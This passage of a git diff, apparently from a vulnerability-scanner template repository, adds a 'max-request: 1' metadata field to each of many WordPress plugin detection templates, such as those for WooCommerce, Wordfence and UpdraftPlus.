   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml
index 180266f448..1fd64a5279 100644
--- a/http/technologies/wordpress/plugins/sg-security.yaml
+++ b/http/technologies/wordpress/plugins/sg-security.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sg-security/
   metadata:
+    max-request: 1
     plugin_namespace: sg-security
     wpscan: https://wpscan.com/plugin/sg-security
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
index 17584cd064..1bb9a283ce 100644
--- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
+++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortcodes-ultimate/
   metadata:
+    max-request: 1
     plugin_namespace: shortcodes-ultimate
     wpscan: https://wpscan.com/plugin/shortcodes-ultimate
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
index 015fb97043..7836d9554c 100644
--- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
+++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/shortpixel-image-optimiser/
   metadata:
+    max-request: 1
     plugin_namespace: shortpixel-image-optimiser
     wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
index 1d5224b457..ccd72e427a 100644
--- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
+++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/simple-custom-post-order/
   metadata:
+    max-request: 1
     plugin_namespace: simple-custom-post-order
     wpscan: https://wpscan.com/plugin/simple-custom-post-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml
index aafd6c6a38..3622b2c6b3 100644
--- a/http/technologies/wordpress/plugins/siteguard.yaml
+++ b/http/technologies/wordpress/plugins/siteguard.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteguard/
   metadata:
+    max-request: 1
     plugin_namespace: siteguard
     wpscan: https://wpscan.com/plugin/siteguard
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
index e10ab985da..9eff765d61 100644
--- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml
+++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/siteorigin-panels/
   metadata:
+    max-request: 1
     plugin_namespace: siteorigin-panels
     wpscan: https://wpscan.com/plugin/siteorigin-panels
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml
index 9881b591ae..c856e1fa9e 100644
--- a/http/technologies/wordpress/plugins/smart-slider-3.yaml
+++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/smart-slider-3/
   metadata:
+    max-request: 1
     plugin_namespace: smart-slider-3
     wpscan: https://wpscan.com/plugin/smart-slider-3
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
index 0480b4b0e6..008440cc58 100644
--- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
+++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/so-widgets-bundle/
   metadata:
+    max-request: 1
     plugin_namespace: so-widgets-bundle
     wpscan: https://wpscan.com/plugin/so-widgets-bundle
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
index 26d525386b..410776862f 100644
--- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
+++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/
   metadata:
+    max-request: 1
     plugin_namespace: stops-core-theme-and-plugin-updates
     wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
index 3920c5cf56..f210a2a2f9 100644
--- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml
+++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/sucuri-scanner/
   metadata:
+    max-request: 1
     plugin_namespace: sucuri-scanner
     wpscan: https://wpscan.com/plugin/sucuri-scanner
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml
index f556786f5a..f1dd1bf150 100644
--- a/http/technologies/wordpress/plugins/svg-support.yaml
+++ b/http/technologies/wordpress/plugins/svg-support.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/svg-support/
   metadata:
+    max-request: 1
     plugin_namespace: svg-support
     wpscan: https://wpscan.com/plugin/svg-support
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
index 844e3d19a0..a9ec913599 100644
--- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
+++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/table-of-contents-plus/
   metadata:
+    max-request: 1
     plugin_namespace: table-of-contents-plus
     wpscan: https://wpscan.com/plugin/table-of-contents-plus
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml
index eb0f02f602..d38aeb0279 100644
--- a/http/technologies/wordpress/plugins/tablepress.yaml
+++ b/http/technologies/wordpress/plugins/tablepress.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tablepress/
   metadata:
+    max-request: 1
     plugin_namespace: tablepress
     wpscan: https://wpscan.com/plugin/tablepress
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
index 755efd53fa..07c43b9d80 100644
--- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
+++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/taxonomy-terms-order/
   metadata:
+    max-request: 1
     plugin_namespace: taxonomy-terms-order
     wpscan: https://wpscan.com/plugin/taxonomy-terms-order
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml
index 0403bb4e72..83a849e11e 100644
--- a/http/technologies/wordpress/plugins/the-events-calendar.yaml
+++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/the-events-calendar/
   metadata:
+    max-request: 1
     plugin_namespace: the-events-calendar
     wpscan: https://wpscan.com/plugin/the-events-calendar
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml
index cd2632ea05..c6100637d9 100644
--- a/http/technologies/wordpress/plugins/themeisle-companion.yaml
+++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/themeisle-companion/
   metadata:
+    max-request: 1
     plugin_namespace: themeisle-companion
     wpscan: https://wpscan.com/plugin/themeisle-companion
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
index b5f8b822c7..1f188b66c6 100644
--- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml
+++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/tinymce-advanced/
   metadata:
+    max-request: 1
     plugin_namespace: tinymce-advanced
     wpscan: https://wpscan.com/plugin/tinymce-advanced
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
index 85aaf7ff16..2c7b16cb44 100644
--- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
+++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/translatepress-multilingual/
   metadata:
+    max-request: 1
     plugin_namespace: translatepress-multilingual
     wpscan: https://wpscan.com/plugin/translatepress-multilingual
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
index 0af322b728..9d6afa8d3f 100644
--- a/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
+++ b/http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/ultimate-addons-for-gutenberg/
   metadata:
+    max-request: 1
     plugin_namespace: ultimate-addons-for-gutenberg
     wpscan: https://wpscan.com/plugin/ultimate-addons-for-gutenberg
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/under-construction-page.yaml b/http/technologies/wordpress/plugins/under-construction-page.yaml
index d4ac0d179e..87721a245a 100644
--- a/http/technologies/wordpress/plugins/under-construction-page.yaml
+++ b/http/technologies/wordpress/plugins/under-construction-page.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/under-construction-page/
   metadata:
+    max-request: 1
     plugin_namespace: under-construction-page
     wpscan: https://wpscan.com/plugin/under-construction-page
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/updraftplus.yaml b/http/technologies/wordpress/plugins/updraftplus.yaml
index dbbadf3cfc..45e0dead0e 100644
--- a/http/technologies/wordpress/plugins/updraftplus.yaml
+++ b/http/technologies/wordpress/plugins/updraftplus.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/updraftplus/
   metadata:
+    max-request: 1
     plugin_namespace: updraftplus
     wpscan: https://wpscan.com/plugin/updraftplus
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/use-any-font.yaml b/http/technologies/wordpress/plugins/use-any-font.yaml
index 401b0e479f..abec174ec3 100644
--- a/http/technologies/wordpress/plugins/use-any-font.yaml
+++ b/http/technologies/wordpress/plugins/use-any-font.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/use-any-font/
   metadata:
+    max-request: 1
     plugin_namespace: use-any-font
     wpscan: https://wpscan.com/plugin/use-any-font
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/user-role-editor.yaml b/http/technologies/wordpress/plugins/user-role-editor.yaml
index 6f95506748..e088ac07a6 100644
--- a/http/technologies/wordpress/plugins/user-role-editor.yaml
+++ b/http/technologies/wordpress/plugins/user-role-editor.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/user-role-editor/
   metadata:
+    max-request: 1
     plugin_namespace: user-role-editor
     wpscan: https://wpscan.com/plugin/user-role-editor
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
index 4404f87aab..8b163200bf 100644
--- a/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
+++ b/http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/velvet-blues-update-urls/
   metadata:
+    max-request: 1
     plugin_namespace: velvet-blues-update-urls
     wpscan: https://wpscan.com/plugin/velvet-blues-update-urls
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/w3-total-cache.yaml b/http/technologies/wordpress/plugins/w3-total-cache.yaml
index 8995434fce..2366a7dad7 100644
--- a/http/technologies/wordpress/plugins/w3-total-cache.yaml
+++ b/http/technologies/wordpress/plugins/w3-total-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/w3-total-cache/
   metadata:
+    max-request: 1
     plugin_namespace: w3-total-cache
     wpscan: https://wpscan.com/plugin/w3-total-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
index 8175806cb8..71448e61e8 100644
--- a/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
+++ b/http/technologies/wordpress/plugins/webp-converter-for-media.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-converter-for-media/
   metadata:
+    max-request: 1
     plugin_namespace: webp-converter-for-media
     wpscan: https://wpscan.com/plugin/webp-converter-for-media
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/webp-express.yaml b/http/technologies/wordpress/plugins/webp-express.yaml
index db82bc7f43..717554b89f 100644
--- a/http/technologies/wordpress/plugins/webp-express.yaml
+++ b/http/technologies/wordpress/plugins/webp-express.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/webp-express/
   metadata:
+    max-request: 1
     plugin_namespace: webp-express
     wpscan: https://wpscan.com/plugin/webp-express
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
index 03ddae57bc..fba5c8b09c 100644
--- a/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
+++ b/http/technologies/wordpress/plugins/widget-importer-exporter.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/widget-importer-exporter/
   metadata:
+    max-request: 1
     plugin_namespace: widget-importer-exporter
     wpscan: https://wpscan.com/plugin/widget-importer-exporter
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
index d6449bb5bf..631202198e 100644
--- a/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
+++ b/http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-cart-abandonment-recovery/
   metadata:
+    max-request: 1
     plugin_namespace: woo-cart-abandonment-recovery
     wpscan: https://wpscan.com/plugin/woo-cart-abandonment-recovery
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
index 2d5fdf1779..cc953078eb 100644
--- a/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
+++ b/http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-checkout-field-editor-pro/
   metadata:
+    max-request: 1
     plugin_namespace: woo-checkout-field-editor-pro
     wpscan: https://wpscan.com/plugin/woo-checkout-field-editor-pro
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
index 6b5705e20d..97ce674116 100644
--- a/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
+++ b/http/technologies/wordpress/plugins/woo-variation-swatches.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woo-variation-swatches/
   metadata:
+    max-request: 1
     plugin_namespace: woo-variation-swatches
     wpscan: https://wpscan.com/plugin/woo-variation-swatches
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
index dbcdb64bad..6d05a6f058 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-paypal-express-checkout/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-paypal-express-checkout
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-paypal-express-checkout
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
index fb9ea502ce..baf5af3bb5 100644
--- a/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-gateway-stripe/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-gateway-stripe
     wpscan: https://wpscan.com/plugin/woocommerce-gateway-stripe
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
index 48ffb25245..aa1898c4ba 100644
--- a/http/technologies/wordpress/plugins/woocommerce-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-payments
     wpscan: https://wpscan.com/plugin/woocommerce-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
index 4fa6fc3ffe..5fae796fdd 100644
--- a/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-paypal-payments/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-paypal-payments
     wpscan: https://wpscan.com/plugin/woocommerce-paypal-payments
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
index 1c1c690fcd..22f812e2b8 100644
--- a/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-pdf-invoices-packing-slips/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-pdf-invoices-packing-slips
     wpscan: https://wpscan.com/plugin/woocommerce-pdf-invoices-packing-slips
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce-services.yaml b/http/technologies/wordpress/plugins/woocommerce-services.yaml
index 4d6702d81a..c637006d26 100644
--- a/http/technologies/wordpress/plugins/woocommerce-services.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce-services.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce-services/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce-services
     wpscan: https://wpscan.com/plugin/woocommerce-services
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/woocommerce.yaml b/http/technologies/wordpress/plugins/woocommerce.yaml
index 42cb8bc409..e020507ccb 100644
--- a/http/technologies/wordpress/plugins/woocommerce.yaml
+++ b/http/technologies/wordpress/plugins/woocommerce.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/woocommerce/
   metadata:
+    max-request: 1
     plugin_namespace: woocommerce
     wpscan: https://wpscan.com/plugin/woocommerce
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordfence.yaml b/http/technologies/wordpress/plugins/wordfence.yaml
index 55d6effbf5..c92903fd79 100644
--- a/http/technologies/wordpress/plugins/wordfence.yaml
+++ b/http/technologies/wordpress/plugins/wordfence.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordfence/
   metadata:
+    max-request: 1
     plugin_namespace: wordfence
     wpscan: https://wpscan.com/plugin/wordfence
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-importer.yaml b/http/technologies/wordpress/plugins/wordpress-importer.yaml
index 6786cab703..c25b2c1c48 100644
--- a/http/technologies/wordpress/plugins/wordpress-importer.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-importer.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-importer/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-importer
     wpscan: https://wpscan.com/plugin/wordpress-importer
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wordpress-seo.yaml b/http/technologies/wordpress/plugins/wordpress-seo.yaml
index 784ba22c8a..4d6dd14d25 100644
--- a/http/technologies/wordpress/plugins/wordpress-seo.yaml
+++ b/http/technologies/wordpress/plugins/wordpress-seo.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wordpress-seo/
   metadata:
+    max-request: 1
     plugin_namespace: wordpress-seo
     wpscan: https://wpscan.com/plugin/wordpress-seo
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/worker.yaml b/http/technologies/wordpress/plugins/worker.yaml
index 72ff55e58a..7ca0870ed6 100644
--- a/http/technologies/wordpress/plugins/worker.yaml
+++ b/http/technologies/wordpress/plugins/worker.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/worker/
   metadata:
+    max-request: 1
     plugin_namespace: worker
     wpscan: https://wpscan.com/plugin/worker
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
index 8cfaa0f5a9..4f0d9be568 100644
--- a/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
+++ b/http/technologies/wordpress/plugins/wp-fastest-cache.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-fastest-cache/
   metadata:
+    max-request: 1
     plugin_namespace: wp-fastest-cache
     wpscan: https://wpscan.com/plugin/wp-fastest-cache
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-file-manager.yaml b/http/technologies/wordpress/plugins/wp-file-manager.yaml
index 85900a01a7..f3c481b824 100644
--- a/http/technologies/wordpress/plugins/wp-file-manager.yaml
+++ b/http/technologies/wordpress/plugins/wp-file-manager.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-file-manager/
   metadata:
+    max-request: 1
     plugin_namespace: wp-file-manager
     wpscan: https://wpscan.com/plugin/wp-file-manager
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-google-maps.yaml b/http/technologies/wordpress/plugins/wp-google-maps.yaml
index a7ccde0b49..ba214fd7ea 100644
--- a/http/technologies/wordpress/plugins/wp-google-maps.yaml
+++ b/http/technologies/wordpress/plugins/wp-google-maps.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-google-maps/
   metadata:
+    max-request: 1
     plugin_namespace: wp-google-maps
     wpscan: https://wpscan.com/plugin/wp-google-maps
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
index 422664a98c..8f5fe8d9a5 100644
--- a/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
+++ b/http/technologies/wordpress/plugins/wp-mail-smtp.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-mail-smtp/
   metadata:
+    max-request: 1
     plugin_namespace: wp-mail-smtp
     wpscan: https://wpscan.com/plugin/wp-mail-smtp
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
index f0af3a748a..0458b13354 100644
--- a/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
+++ b/http/technologies/wordpress/plugins/wp-maintenance-mode.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-maintenance-mode/
   metadata:
+    max-request: 1
     plugin_namespace: wp-maintenance-mode
     wpscan: https://wpscan.com/plugin/wp-maintenance-mode
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-migrate-db.yaml b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
index f89f1a20b3..d570be07bf 100644
--- a/http/technologies/wordpress/plugins/wp-migrate-db.yaml
+++ b/http/technologies/wordpress/plugins/wp-migrate-db.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-migrate-db/
   metadata:
+    max-request: 1
     plugin_namespace: wp-migrate-db
     wpscan: https://wpscan.com/plugin/wp-migrate-db
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
index 01fb12d0ad..ee05e3add8 100644
--- a/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
+++ b/http/technologies/wordpress/plugins/wp-multibyte-patch.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-multibyte-patch/
   metadata:
+    max-request: 1
     plugin_namespace: wp-multibyte-patch
     wpscan: https://wpscan.com/plugin/wp-multibyte-patch
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-optimize.yaml b/http/technologies/wordpress/plugins/wp-optimize.yaml
index 1773857e15..df2487955f 100644
--- a/http/technologies/wordpress/plugins/wp-optimize.yaml
+++ b/http/technologies/wordpress/plugins/wp-optimize.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-optimize/
   metadata:
+    max-request: 1
     plugin_namespace: wp-optimize
     wpscan: https://wpscan.com/plugin/wp-optimize
   tags: tech,wordpress,wp-plugin,top-100,top-200
diff --git a/http/technologies/wordpress/plugins/wp-pagenavi.yaml b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
index bcd1509c68..79ff01211c 100644
--- a/http/technologies/wordpress/plugins/wp-pagenavi.yaml
+++ b/http/technologies/wordpress/plugins/wp-pagenavi.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-pagenavi/
   metadata:
+    max-request: 1
     plugin_namespace: wp-pagenavi
     wpscan: https://wpscan.com/plugin/wp-pagenavi
   tags: tech,wordpress,wp-plugin,top-200
diff --git a/http/technologies/wordpress/plugins/wp-reset.yaml b/http/technologies/wordpress/plugins/wp-reset.yaml
index c6aca20a60..23414b3d1d 100644
--- a/http/technologies/wordpress/plugins/wp-reset.yaml
+++ b/http/technologies/wordpress/plugins/wp-reset.yaml
@@ -7,6 +7,7 @@ info:
   reference:
     - https://wordpress.org/plugins/wp-reset/
   metadata:
+    max-request: 1
     plugin_namespace: wp-reset
     wpscan: https://wpscan.com/plugin/wp-reset
   tags: tech,wordpress,wp-plugin,top-200
